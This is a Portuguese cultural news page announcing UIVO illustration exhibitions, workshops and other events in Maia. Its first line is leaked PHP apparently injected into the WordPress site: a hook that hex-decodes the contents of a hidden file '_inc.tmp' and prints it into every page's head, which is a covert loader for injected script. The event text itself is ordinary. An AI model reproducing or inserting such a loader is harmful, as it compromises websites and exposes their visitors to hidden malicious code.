if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } UIVO em actividade - artesentreasletras.com.pt

UIVO em actividade

O próximo fim de semana, 5 e 6 de Fevereiro, será marcado por várias actividades relacionadas com a UIVO – Mostra de Ilustração da Maia. Para além da exposição patente no Fórum da Maia que pode ser visitada guiada pelo “Colectivo ARiSCA”, inauguram as exposições UIVINHO 4 – Mostra de Ilustração Infantil da Maia, exposição com os trabalhos resultantes das oficinas de ilustração, cujo tema foi “Ilustrário Imaginário”, realizados com os alunos das escolas do concelho da Maia e nas oficinas com famílias programadas para o Fórum da Maia, e a “Ilustração Sai à Rua” – Mostra de Ilustração no Espaço Público, 16 ilustrações de diferentes autores serão expostas na praça adjacente ao Fórum da Maia. Esta exposição pretende possibilitar uma aproximação à comunidade, privilegiando o espaço público como meio de atuação e de comunicação com o público. Ainda no âmbito da UIVO, podem participar na Oficina Volante “O Corpo do(no) Futuro”, como é que vamos ser no futuro, daqui a muito tempo, com todas as mudanças que estamos a atravessar? De que forma podemos imaginar, será que nos conseguimos ilustrar? Vamos conhecer os artistas da UIVO 11 -dentro e fora de portas- para ver o que andam a magicar, talvez nos possamos relacionar! Sábado de manhã, no espaço exterior do Fórum da Maia.
No domingo à tarde, o Instituto Cultural da Maia sobe ao palco do Fórum para apresentar “Casada à Força”, a partir de Moliére, com entrada gratuita.
A Biblioteca começa Fevereiro com atividades engraçadas para despertar o gosto pela leitura aos mais novos, enquanto o Museu de História e Etnologia das Terras da Maia tem patente duas exposições para melhor percebermos a história da Maia.
Com o mesmo objetivo, dar a conhecer as história da Maia e dos Maiatos, o Gabinete de História tem três exposições em diversos espaços do concelho. “As Igrejas do Concelho da Maia” na Junta de Freguesia Nogueira/Silva Escura, as “Quintas da Maia”, na Junta de Freguesia de S. Pedro Fins e “Uma Maiata por África”, no TecMaia.